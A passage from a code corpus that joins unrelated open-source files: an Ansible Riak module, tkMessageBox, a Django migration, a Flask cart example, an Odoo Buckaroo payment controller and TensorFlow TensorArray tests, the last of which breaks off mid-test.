            config_dir=dict(default='/etc/riak', type='path'),
            http_conn=dict(required=False, default='127.0.0.1:8098'),
            target_node=dict(default='riak@127.0.0.1', required=False),
            wait_for_handoffs=dict(default=False, type='int'),
            wait_for_ring=dict(default=False, type='int'),
            wait_for_service=dict(
                required=False, default=None, choices=['kv']),
            validate_certs = dict(default='yes', type='bool'))
    )
    command = module.params.get('command')
    config_dir = module.params.get('config_dir')
    http_conn = module.params.get('http_conn')
    target_node = module.params.get('target_node')
    wait_for_handoffs = module.params.get('wait_for_handoffs')
    wait_for_ring = module.params.get('wait_for_ring')
    wait_for_service = module.params.get('wait_for_service')
    validate_certs = module.params.get('validate_certs')
    # Make sure the riak command-line tools are on the path.
    riak_bin = module.get_bin_path('riak')
    riak_admin_bin = module.get_bin_path('riak-admin')
    # Poll the HTTP stats endpoint; give Riak up to two minutes to answer.
    timeout = time.time() + 120
    while True:
        if time.time() > timeout:
            module.fail_json(msg='Timeout, could not fetch Riak stats.')
        (response, info) = fetch_url(module, 'http://%s/stats' % (http_conn), force=True, timeout=5)
        if info['status'] == 200:
            stats_raw = response.read()
            break
        time.sleep(5)
    # here we attempt to load those stats,
    try:
        stats = json.loads(stats_raw)
    except:
        module.fail_json(msg='Could not parse Riak stats.')
    node_name = stats['nodename']
    nodes = stats['ring_members']
    ring_size = stats['ring_creation_size']
    rc, out, err = module.run_command([riak_bin, 'version'] )
    version = out.strip()
    # Base facts returned regardless of which command (if any) is run.
    result = dict(node_name=node_name,
              nodes=nodes,
              ring_size=ring_size,
              version=version)
    if command == 'ping':
        cmd = '%s ping %s' % ( riak_bin, target_node )
        rc, out, err = module.run_command(cmd)
        if rc == 0:
            result['ping'] = out
        else:
            module.fail_json(msg=out)
    elif command == 'kv_test':
        cmd = '%s test' % riak_admin_bin
        rc, out, err = module.run_command(cmd)
        if rc == 0:
            result['kv_test'] = out
        else:
            module.fail_json(msg=out)
    elif command == 'join':
        # Skip the join when this node is already a ring member (or staged).
        if nodes.count(node_name) == 1 and len(nodes) > 1:
            result['join'] = 'Node is already in cluster or staged to be in cluster.'
        else:
            cmd = '%s cluster join %s' % (riak_admin_bin, target_node)
            rc, out, err = module.run_command(cmd)
            if rc == 0:
                result['join'] = out
                result['changed'] = True
            else:
                module.fail_json(msg=out)
    elif command == 'plan':
        cmd = '%s cluster plan' % riak_admin_bin
        rc, out, err = module.run_command(cmd)
        if rc == 0:
            result['plan'] = out
            if 'Staged Changes' in out:
                result['changed'] = True
        else:
            module.fail_json(msg=out)
    elif command == 'commit':
        cmd = '%s cluster commit' % riak_admin_bin
        rc, out, err = module.run_command(cmd)
        if rc == 0:
            result['commit'] = out
            result['changed'] = True
        else:
            module.fail_json(msg=out)
    # this could take a while, recommend to run in async mode
    if wait_for_handoffs:
        timeout = time.time() + wait_for_handoffs
        while True:
            cmd = '%s transfers' % riak_admin_bin
            rc, out, err = module.run_command(cmd)
            if 'No transfers active' in out:
                result['handoffs'] = 'No transfers active.'
                break
            time.sleep(10)
            if time.time() > timeout:
                module.fail_json(msg='Timeout waiting for handoffs.')
    if wait_for_service:
        # NOTE(review): no timeout here -- riak-admin wait_for_service is
        # presumably expected to block until the service is up; confirm.
        cmd = [riak_admin_bin, 'wait_for_service', 'riak_%s' % wait_for_service, node_name ]
        rc, out, err = module.run_command(cmd)
        result['service'] = out
    if wait_for_ring:
        timeout = time.time() + wait_for_ring
        while True:
            if ring_check(module, riak_admin_bin):
                break
            time.sleep(10)
            if time.time() > timeout:
                module.fail_json(msg='Timeout waiting for nodes to agree on ring.')
    result['ring_ready'] = ring_check(module, riak_admin_bin)
    module.exit_json(**result)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.urls import *
if __name__ == '__main__':
main()
| gpl-3.0 |
beiko-lab/gengis | bin/Lib/lib-tk/tkMessageBox.py | 9 | 3821 | # tk common message boxes
#
# this module provides an interface to the native message boxes
# available in Tk 4.2 and newer.
#
# written by Fredrik Lundh, May 1997
#
#
# options (all have default values):
#
# - default: which button to make default (one of the reply codes)
#
# - icon: which icon to display (see below)
#
# - message: the message to display
#
# - parent: which window to place the dialog on top of
#
# - title: dialog title
#
# - type: dialog type; that is, which buttons to display (see below)
#
from tkCommonDialog import Dialog
#
# constants
# icons
ERROR = "error"
INFO = "info"
QUESTION = "question"
WARNING = "warning"
# types
ABORTRETRYIGNORE = "abortretryignore"
OK = "ok"
OKCANCEL = "okcancel"
RETRYCANCEL = "retrycancel"
YESNO = "yesno"
YESNOCANCEL = "yesnocancel"
# replies
ABORT = "abort"
RETRY = "retry"
IGNORE = "ignore"
OK = "ok"
CANCEL = "cancel"
YES = "yes"
NO = "no"
#
# message dialog class
class Message(Dialog):
    "A message box"
    # Tcl command executed by the Dialog base class to display the box.
    command = "tk_messageBox"
#
# convenience stuff
# Rename _icon and _type options to allow overriding them in options
def _show(title=None, message=None, _icon=None, _type=None, **options):
    """Display a tk_messageBox dialog and normalize the reply to a string."""
    # _icon/_type are fallbacks only: explicit "icon"/"type" entries in
    # options take precedence over them.
    for key, fallback in (("icon", _icon), ("type", _type)):
        if fallback and key not in options:
            options[key] = fallback
    # title/message, by contrast, always win over entries in options.
    if title:
        options["title"] = title
    if message:
        options["message"] = message
    res = Message(**options).show()
    # Some Tcl installations convert a yes/no answer into a boolean...
    if isinstance(res, bool):
        return YES if res else NO
    # ...others hand back a Tcl_Obj, so normalize to str either way.
    return str(res)
def showinfo(title=None, message=None, **options):
    """Display an informational message box; return the reply string."""
    return _show(title, message, _icon=INFO, _type=OK, **options)
def showwarning(title=None, message=None, **options):
    """Display a warning message box; return the reply string."""
    return _show(title, message, _icon=WARNING, _type=OK, **options)
def showerror(title=None, message=None, **options):
    """Display an error message box; return the reply string."""
    return _show(title, message, _icon=ERROR, _type=OK, **options)
def askquestion(title=None, message=None, **options):
    """Ask a yes/no question; return the reply string (YES or NO)."""
    return _show(title, message, _icon=QUESTION, _type=YESNO, **options)
def askokcancel(title=None, message=None, **options):
    """Ask whether an operation should proceed; True means the user chose OK."""
    reply = _show(title, message, _icon=QUESTION, _type=OKCANCEL, **options)
    return reply == OK
def askyesno(title=None, message=None, **options):
    """Ask a yes/no question; True means the user answered yes."""
    reply = _show(title, message, _icon=QUESTION, _type=YESNO, **options)
    return reply == YES
def askyesnocancel(title=None, message=None, **options):
    """Ask a question; True for yes, False for no, None if cancelled."""
    reply = _show(title, message, _icon=QUESTION, _type=YESNOCANCEL, **options)
    # The reply might be a Tcl index object, so coerce it to a string first.
    reply = str(reply)
    if reply == CANCEL:
        return None
    return reply == YES
def askretrycancel(title=None, message=None, **options):
    """Ask whether an operation should be retried; True means retry."""
    reply = _show(title, message, _icon=WARNING, _type=RETRYCANCEL, **options)
    return reply == RETRY
# --------------------------------------------------------------------
# test stuff
if __name__ == "__main__":
    # Interactive smoke test: pops up each dialog type in turn and echoes
    # the reply (Python 2 print statements; this module predates Python 3).
    print "info", showinfo("Spam", "Egg Information")
    print "warning", showwarning("Spam", "Egg Warning")
    print "error", showerror("Spam", "Egg Alert")
    print "question", askquestion("Spam", "Question?")
    print "proceed", askokcancel("Spam", "Proceed?")
    print "yes/no", askyesno("Spam", "Got it?")
    print "yes/no/cancel", askyesnocancel("Spam", "Want it?")
    print "try again", askretrycancel("Spam", "Try again?")
| gpl-3.0 |
whitewhim2718/python-qinfer | src/qinfer/_lib/__init__.py | 3 | 1155 | #!/usr/bin/python
# -*- coding: utf-8 -*-
##
# _lib/: Copies of external libraries used by QInfer, such as docopt.
# Note that all other files in this directory are copyrighted and
# licensed as described within each file, or by the corresponding
# LICENSE and/or COPYING files.
##
# © 2012 Chris Ferrie (csferrie@gmail.com) and
# Christopher E. Granade (cgranade@gmail.com)
#
# This file is a part of the Qinfer project.
# Licensed under the AGPL version 3.
##
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
##
| agpl-3.0 |
fosfataza/protwis | ligand/migrations/0001_initial.py | 3 | 6236 | # Generated by Django 2.0.1 on 2018-01-17 13:57
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated by Django 2.0.1 (see header); regenerate with
    # `makemigrations` rather than hand-editing the operations below.
    initial = True
    dependencies = [
        ('common', '0001_initial'),
    ]
    operations = [
        migrations.CreateModel(
            name='AssayExperiment',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('assay_type', models.CharField(max_length=10)),
                ('assay_description', models.TextField(max_length=1000)),
                ('pchembl_value', models.DecimalField(decimal_places=3, max_digits=9)),
                ('published_value', models.DecimalField(decimal_places=3, max_digits=9)),
                ('published_relation', models.CharField(max_length=10)),
                ('published_type', models.CharField(max_length=20)),
                ('published_units', models.CharField(max_length=20)),
                ('standard_value', models.DecimalField(decimal_places=3, max_digits=9)),
                ('standard_relation', models.CharField(max_length=10)),
                ('standard_type', models.CharField(max_length=20)),
                ('standard_units', models.CharField(max_length=20)),
            ],
        ),
        migrations.CreateModel(
            name='ChemblAssay',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('assay_id', models.CharField(max_length=50, unique=True)),
                ('web_links', models.ManyToManyField(to='common.WebLink')),
            ],
            options={
                'db_table': 'chembl_assays',
            },
        ),
        migrations.CreateModel(
            name='Ligand',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.TextField()),
                ('canonical', models.NullBooleanField()),
                ('ambigious_alias', models.NullBooleanField()),
            ],
            options={
                'db_table': 'ligand',
            },
        ),
        migrations.CreateModel(
            name='LigandProperities',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('smiles', models.TextField(null=True)),
                ('inchikey', models.CharField(max_length=50, null=True, unique=True)),
                ('mw', models.DecimalField(decimal_places=3, max_digits=15, null=True)),
                ('rotatable_bonds', models.SmallIntegerField(null=True)),
                ('hacc', models.SmallIntegerField(null=True)),
                ('hdon', models.SmallIntegerField(null=True)),
                ('logp', models.DecimalField(decimal_places=3, max_digits=10, null=True)),
            ],
            options={
                'db_table': 'ligand_properities',
            },
        ),
        migrations.CreateModel(
            name='LigandRole',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('slug', models.SlugField(unique=True)),
                ('name', models.CharField(max_length=100)),
            ],
            options={
                'db_table': 'ligand_role',
            },
        ),
        migrations.CreateModel(
            name='LigandType',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('slug', models.SlugField(max_length=20, unique=True)),
                ('name', models.CharField(max_length=100)),
            ],
            options={
                'db_table': 'ligand_type',
            },
        ),
        migrations.CreateModel(
            name='LigandVendorLink',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('url', models.CharField(max_length=300)),
                ('vendor_external_id', models.CharField(max_length=300)),
                ('sid', models.CharField(max_length=200, unique=True)),
                ('lp', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='vendors', to='ligand.LigandProperities')),
            ],
        ),
        migrations.CreateModel(
            name='LigandVendors',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('slug', models.SlugField(max_length=100, unique=True)),
                ('name', models.CharField(default='', max_length=200)),
                ('url', models.TextField(null=True)),
            ],
        ),
        migrations.AddField(
            model_name='ligandvendorlink',
            name='vendor',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='ligand.LigandVendors'),
        ),
        migrations.AddField(
            model_name='ligandproperities',
            name='ligand_type',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='ligand.LigandType'),
        ),
        migrations.AddField(
            model_name='ligandproperities',
            name='web_links',
            field=models.ManyToManyField(to='common.WebLink'),
        ),
        migrations.AddField(
            model_name='ligand',
            name='properities',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='ligand.LigandProperities'),
        ),
        migrations.AddField(
            model_name='assayexperiment',
            name='assay',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='ligand.ChemblAssay'),
        ),
        migrations.AddField(
            model_name='assayexperiment',
            name='ligand',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='ligand.Ligand'),
        ),
    ]
| apache-2.0 |
abacuspix/NFV_project | Build_Web_With_Flask/Building web applications with Flask_Code/chapter08/ex05.py | 1 | 1529 | # coding:utf-8
from flask import Flask, render_template, session, flash
from flask.ext.sqlalchemy import SQLAlchemy
app = Flask(__name__)
# strong secret key!!
app.config['SECRET_KEY'] = '\xa6\xb5\x0e\x7f\xd3}\x0b-\xaa\x03\x03\x82\x10\xbe\x1e0u\x93,{\xd4Z\xa3\x8f'
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///ex05.sqlite'
db = SQLAlchemy(app)
class Product(db.Model):
    # Catalog item persisted via Flask-SQLAlchemy.
    __tablename__ = 'products'
    id = db.Column(db.Integer, primary_key=True)
    sku = db.Column(db.String(30), unique=True)  # stock-keeping unit used in cart URLs
    name = db.Column(db.String(255), nullable=False)
    def __unicode__(self):
        # Python 2 display form; used e.g. by the flash message in the cart view.
        return self.name
@app.route("/cart/add/<sku>")
def add_to_cart_view(sku):
    """Add one unit of the product identified by `sku` to the session cart."""
    product = Product.query.filter_by(sku=sku).first()
    if product is None:
        # Unknown SKU: just re-render the cart unchanged.
        return render_template('cart.html')
    cart = session.get('cart') or dict()
    entry = cart.get(product.sku) or dict()
    entry['qty'] = entry.get('qty', 0) + 1
    cart[product.sku] = entry
    # Re-assigning the top-level key ensures the session is marked modified.
    session['cart'] = cart
    flash(u'%s add to cart. Total: %d' % (product, entry['qty']))
    return render_template('cart.html')
def init():
    """Create the schema and seed it with demo products (idempotent)."""
    db.create_all()
    if Product.query.count() != 0:
        # Already seeded -- nothing to do.
        return
    seed = [('010', 'Boots'), ('020', 'Gauntlets'), ('030', 'Helmets')]
    db.session.add_all([Product(sku=s, name=n) for s, n in seed])
    db.session.commit()
if __name__ == '__main__':
    # Dev entry point: seed the database inside a request context
    # (required for session/flash machinery), then start the debug server.
    app.debug = True
    with app.test_request_context():
        init()
    app.run()
brijeshkesariya/odoo | addons/payment_buckaroo/controllers/main.py | 325 | 1270 | # -*- coding: utf-8 -*-
try:
import simplejson as json
except ImportError:
import json
import logging
import pprint
import werkzeug
from openerp import http, SUPERUSER_ID
from openerp.http import request
_logger = logging.getLogger(__name__)
class BuckarooController(http.Controller):
    # URLs Buckaroo redirects the customer to after a payment attempt;
    # all four outcomes are handled by the same route below.
    _return_url = '/payment/buckaroo/return'
    _cancel_url = '/payment/buckaroo/cancel'
    _exception_url = '/payment/buckaroo/error'
    _reject_url = '/payment/buckaroo/reject'
    @http.route([
        '/payment/buckaroo/return',
        '/payment/buckaroo/cancel',
        '/payment/buckaroo/error',
        '/payment/buckaroo/reject',
    ], type='http', auth='none')
    def buckaroo_return(self, **post):
        """Handle Buckaroo's post-payment redirect: record the transaction
        feedback, then send the customer back to the shop's return URL."""
        _logger.info('Buckaroo: entering form_feedback with post data %s', pprint.pformat(post)) # debug
        request.registry['payment.transaction'].form_feedback(request.cr, SUPERUSER_ID, post, 'buckaroo', context=request.context)
        return_url = post.pop('return_url', '')
        if not return_url:
            # Fall back to the return URL embedded in ADD_RETURNDATA; the
            # payload arrives single-quoted, so swap quotes for json.loads.
            data ='' + post.pop('ADD_RETURNDATA', '{}').replace("'", "\"")
            custom = json.loads(data)
            return_url = custom.pop('return_url', '/')
        return werkzeug.utils.redirect(return_url)
| agpl-3.0 |
DeepThoughtTeam/tensorflow | tensorflow/python/kernel_tests/tensor_array_ops_test.py | 1 | 16965 | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.tensor_array_ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=unused-import,g-bad-import-order
import tensorflow.python.platform
# pylint: enable=unused-import,g-bad-import-order
import numpy as np
import tensorflow as tf
from tensorflow.python.framework import errors
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import gen_data_flow_ops
class TensorArrayTest(tf.test.TestCase):
def _testTensorArrayWriteRead(self, use_gpu):
with self.test_session(use_gpu=use_gpu) as sess:
h = data_flow_ops.TensorArray(
dtype=tf.float32, tensor_array_name="foo", size=3)
w0 = h.write(0, [[4.0, 5.0]])
w1 = w0.write(1, [[1.0]])
w2 = w1.write(2, -3.0)
r0 = w2.read(0)
r1 = w2.read(1)
r2 = w2.read(2)
d0, d1, d2 = sess.run([r0, r1, r2])
self.assertAllEqual([[4.0, 5.0]], d0)
self.assertAllEqual([[1.0]], d1)
self.assertAllEqual(-3.0, d2)
def testTensorArrayWriteRead(self):
self._testTensorArrayWriteRead(use_gpu=False)
self._testTensorArrayWriteRead(use_gpu=True)
def _testTensorArrayWritePack(self, tf_dtype, use_gpu):
dtype = tf_dtype.as_numpy_dtype()
with self.test_session(use_gpu=use_gpu):
h = data_flow_ops.TensorArray(
dtype=tf_dtype, tensor_array_name="foo", size=3)
if tf_dtype == tf.string:
convert = lambda x: np.asarray(x).astype(np.str)
else:
convert = lambda x: np.asarray(x).astype(dtype)
w0 = h.write(0, convert([[4.0, 5.0]]))
w1 = w0.write(1, convert([[6.0, 7.0]]))
w2 = w1.write(2, convert([[8.0, 9.0]]))
c0 = w2.pack()
self.assertAllEqual(
convert([[[4.0, 5.0]], [[6.0, 7.0]], [[8.0, 9.0]]]), c0.eval())
def _testTensorArrayWritePackWithType(self, tf_dtype):
self._testTensorArrayWritePack(tf_dtype=tf_dtype, use_gpu=False)
self._testTensorArrayWritePack(tf_dtype=tf_dtype, use_gpu=True)
def testTensorArrayWritePack(self):
self._testTensorArrayWritePackWithType(tf.float32)
self._testTensorArrayWritePackWithType(tf.float64)
self._testTensorArrayWritePackWithType(tf.int32)
self._testTensorArrayWritePackWithType(tf.int64)
self._testTensorArrayWritePackWithType(tf.complex64)
self._testTensorArrayWritePackWithType(tf.string)
def testTensorArrayUnpackWrongMajorSizeFails(self):
with self.test_session():
h = data_flow_ops.TensorArray(
dtype=tf.float32, tensor_array_name="foo", size=3)
with self.assertRaisesOpError(
r"Input value must have first dimension "
r"equal to the array size \(2 vs. 3\)"):
h.unpack([1.0, 2.0]).flow.eval()
def testTensorArrayPackNotAllValuesAvailableFails(self):
with self.test_session():
h = data_flow_ops.TensorArray(
dtype=tf.float32, tensor_array_name="foo", size=3)
with self.assertRaisesOpError(
"Could not read from TensorArray index 1 "
"because it has not yet been written to."):
h.write(0, [[4.0, 5.0]]).pack().eval()
def _testTensorArrayUnpackRead(self, tf_dtype, use_gpu):
dtype = tf_dtype.as_numpy_dtype()
with self.test_session(use_gpu=use_gpu) as sess:
h = data_flow_ops.TensorArray(
dtype=tf_dtype, tensor_array_name="foo", size=3)
if tf_dtype == tf.string:
convert = lambda x: np.asarray(x).astype(np.str)
else:
convert = lambda x: np.asarray(x).astype(dtype)
# Unpack a vector into scalars
w0 = h.unpack(convert([1.0, 2.0, 3.0]))
r0 = w0.read(0)
r1 = w0.read(1)
r2 = w0.read(2)
d0, d1, d2 = sess.run([r0, r1, r2])
self.assertAllEqual(convert(1.0), d0)
self.assertAllEqual(convert(2.0), d1)
self.assertAllEqual(convert(3.0), d2)
# Unpack a matrix into vectors
w1 = h.unpack(convert([[1.0, 1.1], [2.0, 2.1], [3.0, 3.1]]))
r0 = w1.read(0)
r1 = w1.read(1)
r2 = w1.read(2)
d0, d1, d2 = sess.run([r0, r1, r2])
self.assertAllEqual(convert([1.0, 1.1]), d0)
self.assertAllEqual(convert([2.0, 2.1]), d1)
self.assertAllEqual(convert([3.0, 3.1]), d2)
def _testTensorArrayUnpackReadWithType(self, tf_dtype):
self._testTensorArrayUnpackRead(tf_dtype=tf_dtype, use_gpu=False)
self._testTensorArrayUnpackRead(tf_dtype=tf_dtype, use_gpu=True)
def testTensorArrayUnpackRead(self):
self._testTensorArrayUnpackReadWithType(tf.float32)
self._testTensorArrayUnpackReadWithType(tf.float64)
self._testTensorArrayUnpackReadWithType(tf.int32)
self._testTensorArrayUnpackReadWithType(tf.int64)
self._testTensorArrayUnpackReadWithType(tf.complex64)
self._testTensorArrayUnpackReadWithType(tf.string)
def _testTensorGradArrayWriteRead(self, use_gpu):
with self.test_session(use_gpu=use_gpu) as sess:
h = data_flow_ops.TensorArray(
dtype=tf.float32, tensor_array_name="foo", size=3)
g_h = h.grad()
w0 = h.write(0, [[4.0, 5.0]])
w1 = w0.write(1, [[1.0]])
w2 = w1.write(2, -3.0)
g_w0 = g_h.write(0, [[5.0, 6.0]])
g_w1 = g_w0.write(1, [[2.0]])
g_w2 = g_w1.write(2, -2.0)
r0 = w2.read(0)
r1 = w2.read(1)
r2 = w2.read(2)
g_r0 = g_w2.read(0)
g_r1 = g_w2.read(1)
g_r2 = g_w2.read(2)
d0, d1, d2, g_d0, g_d1, g_d2 = sess.run([r0, r1, r2, g_r0, g_r1, g_r2])
self.assertAllEqual([[4.0, 5.0]], d0)
self.assertAllEqual([[1.0]], d1)
self.assertAllEqual(-3.0, d2)
self.assertAllEqual([[5.0, 6.0]], g_d0)
self.assertAllEqual([[2.0]], g_d1)
self.assertAllEqual(-2.0, g_d2)
def testTensorGradArrayWriteRead(self):
self._testTensorGradArrayWriteRead(use_gpu=False)
self._testTensorGradArrayWriteRead(use_gpu=True)
def _testTensorGradAccessTwiceReceiveSameObject(self, use_gpu):
with self.test_session(use_gpu=use_gpu) as sess:
h = data_flow_ops.TensorArray(
dtype=tf.float32, tensor_array_name="foo", size=3)
g_h_0 = h.grad()
g_h_1 = h.grad()
with tf.control_dependencies([g_h_0.write(0, [[4.0, 5.0]]).flow]):
# Write with one gradient handle, read with another copy of it
r1_0 = g_h_1.read(0)
t_g_h_0, t_g_h_1, d_r1_0 = sess.run([g_h_0.handle, g_h_1.handle, r1_0])
self.assertAllEqual(t_g_h_0, t_g_h_1)
self.assertAllEqual([[4.0, 5.0]], d_r1_0)
def testTensorGradAccessTwiceReceiveSameObject(self):
self._testTensorGradAccessTwiceReceiveSameObject(False)
self._testTensorGradAccessTwiceReceiveSameObject(True)
def _testTensorArrayWriteWrongIndexOrDataTypeFails(self, use_gpu):
with self.test_session(use_gpu=use_gpu):
h = data_flow_ops.TensorArray(
dtype=tf.float32, tensor_array_name="foo", size=3)
# Test writing the wrong datatype
with self.assertRaisesOpError(
"TensorArray dtype is float but Op is trying to write dtype string"):
h.write(-1, "wrong_type_scalar").flow.eval()
# Test writing to a negative index
with self.assertRaisesOpError(
"Tried to write to index -1 but array size is: 3"):
h.write(-1, 3.0).flow.eval()
# Test reading from too large an index
with self.assertRaisesOpError(
"Tried to write to index 3 but array size is: 3"):
h.write(3, 3.0).flow.eval()
def testTensorArrayWriteWrongIndexOrDataTypeFails(self):
self._testTensorArrayWriteWrongIndexOrDataTypeFails(use_gpu=False)
self._testTensorArrayWriteWrongIndexOrDataTypeFails(use_gpu=True)
def _testTensorArrayReadWrongIndexOrDataTypeFails(self, use_gpu):
with self.test_session(use_gpu=use_gpu):
h = data_flow_ops.TensorArray(
dtype=tf.float32, tensor_array_name="foo", size=3)
w0 = h.write(0, [[4.0, 5.0]])
# Test reading wrong datatype
r0_bad = gen_data_flow_ops._tensor_array_read(
handle=w0.handle, index=0, dtype=tf.int64, flow_in=w0.flow)
with self.assertRaisesOpError(
"TensorArray dtype is float but Op requested dtype int64."):
r0_bad.eval()
# Test reading from a different index than the one we wrote to
r1 = w0.read(1)
with self.assertRaisesOpError(
"Could not read from TensorArray index 1 because "
"it has not yet been written to."):
r1.eval()
# Test reading from a negative index
with self.assertRaisesOpError(
r"Tried to read from index -1 but array size is: 3"):
h.read(-1).eval()
# Test reading from too large an index
with self.assertRaisesOpError(
"Tried to read from index 3 but array size is: 3"):
h.read(3).eval()
def testTensorArrayReadWrongIndexOrDataTypeFails(self):
self._testTensorArrayReadWrongIndexOrDataTypeFails(use_gpu=False)
self._testTensorArrayReadWrongIndexOrDataTypeFails(use_gpu=True)
def _testTensorArrayWriteMultipleFails(self, use_gpu):
with self.test_session(use_gpu=use_gpu):
h = data_flow_ops.TensorArray(
dtype=tf.float32, tensor_array_name="foo", size=3)
with self.assertRaisesOpError(
"Could not write to TensorArray index 2 because "
"it has already been written to."):
h.write(2, 3.0).write(2, 3.0).flow.eval()
def testTensorArrayWriteMultipleFails(self):
self._testTensorArrayWriteMultipleFails(use_gpu=False)
self._testTensorArrayWriteMultipleFails(use_gpu=True)
def _testTensorArrayWriteGradientAddMultipleAddsType(self, use_gpu, dtype):
with self.test_session(use_gpu=use_gpu):
h = data_flow_ops.TensorArray(
dtype=dtype, tensor_array_name="foo", size=3)
h._gradient_add = True
c = lambda x: np.asarray(x, dtype=dtype.as_numpy_dtype)
w0 = h.write(2, c(3.0))
w1 = w0.write(2, c(4.0))
self.assertAllEqual(c(7.00), w1.read(2).eval())
def _testTensorArrayWriteGradientAddMultipleAdds(self, use_gpu):
for dtype in [tf.int32, tf.int64, tf.float32, tf.float64, tf.complex64]:
self._testTensorArrayWriteGradientAddMultipleAddsType(use_gpu, dtype)
def testTensorArrayWriteGradientAddMultipleAdds(self):
self._testTensorArrayWriteGradientAddMultipleAdds(use_gpu=False)
self._testTensorArrayWriteGradientAddMultipleAdds(use_gpu=True)
def _testMultiTensorArray(self, use_gpu):
with self.test_session(use_gpu=use_gpu):
h1 = data_flow_ops.TensorArray(
size=1, dtype=tf.float32, tensor_array_name="foo")
w1 = h1.write(0, 4.0)
r1 = w1.read(0)
h2 = data_flow_ops.TensorArray(
size=1, dtype=tf.float32, tensor_array_name="bar")
w2 = h2.write(0, 5.0)
r2 = w2.read(0)
r = r1 + r2
self.assertAllClose(9.0, r.eval())
def testMultiTensorArray(self):
self._testMultiTensorArray(use_gpu=False)
self._testMultiTensorArray(use_gpu=True)
def _testDuplicateTensorArrayFails(self, use_gpu):
with self.test_session(use_gpu=use_gpu) as sess:
h1 = data_flow_ops.TensorArray(
size=1, dtype=tf.float32, tensor_array_name="foo")
c1 = h1.write(0, 4.0)
h2 = data_flow_ops.TensorArray(
size=1, dtype=tf.float32, tensor_array_name="foo")
c2 = h2.write(0, 5.0)
with self.assertRaises(errors.AlreadyExistsError):
sess.run([c1.flow, c2.flow])
def testDuplicateTensorArrayFails(self):
self._testDuplicateTensorArrayFails(use_gpu=False)
self._testDuplicateTensorArrayFails(use_gpu=True)
def _testTensorArrayGradientWriteReadType(self, use_gpu, dtype):
with self.test_session(use_gpu=use_gpu) as sess:
h = data_flow_ops.TensorArray(
dtype=tf.as_dtype(dtype), tensor_array_name="foo", size=3)
c = lambda x: np.array(x, dtype=dtype)
value_0 = tf.constant(c([[4.0, 5.0]]))
value_1 = tf.constant(c(3.0))
w0 = h.write(0, value_0)
w1 = w0.write(1, value_1)
r0 = w1.read(0)
r1 = w1.read(1)
r0_2 = w1.read(0)
# Test individual components' gradients
grad_just_r0 = tf.gradients(
ys=[r0], xs=[value_0], grad_ys=[c([[2.0, 3.0]])])
grad_just_r0_vals = sess.run(grad_just_r0)
self.assertAllEqual(c([[2.0, 3.0]]), grad_just_r0_vals[0])
grad_r0_r0_2 = tf.gradients(
ys=[r0, r0_2], xs=[value_0],
grad_ys=[c([[2.0, 3.0]]), c([[1.0, -1.0]])])
grad_r0_r0_2_vals = sess.run(grad_r0_r0_2)
self.assertAllEqual(c([[3.0, 2.0]]), grad_r0_r0_2_vals[0])
grad_just_r1 = tf.gradients(
ys=[r1], xs=[value_1], grad_ys=[c(-2.0)])
grad_just_r1_vals = sess.run(grad_just_r1)
self.assertAllEqual(c(-2.0), grad_just_r1_vals[0])
# Test combined gradients
grad = tf.gradients(
ys=[r0, r0_2, r1], xs=[value_0, value_1],
grad_ys=[c(-1.0), c(-2.0), c([[2.0, 3.0]])])
grad_vals = sess.run(grad)
self.assertEqual(len(grad_vals), 2)
self.assertAllClose(c(-3.0), grad_vals[0])
self.assertAllEqual(c([[2.0, 3.0]]), grad_vals[1])
def _testTensorArrayGradientWriteRead(self, use_gpu):
for dtype in (np.float32, np.float64, np.int32, np.int64, np.complex64):
self._testTensorArrayGradientWriteReadType(use_gpu, dtype)
def testTensorArrayGradientWriteRead(self):
self._testTensorArrayGradientWriteRead(False)
self._testTensorArrayGradientWriteRead(True)
  def _testTensorArrayGradientWritePackAndRead(self, use_gpu):
    """Gradients must accumulate across read(0) and pack() of the same array."""
    with self.test_session(use_gpu=use_gpu) as sess:
      h = data_flow_ops.TensorArray(
          dtype=tf.float32, tensor_array_name="foo", size=2)
      value_0 = tf.constant([-1.0, 1.0])
      value_1 = tf.constant([-10.0, 10.0])

      w0 = h.write(0, value_0)
      w1 = w0.write(1, value_1)
      p0 = w1.pack()
      r0 = w1.read(0)

      # Test gradient accumulation between read(0) and pack()
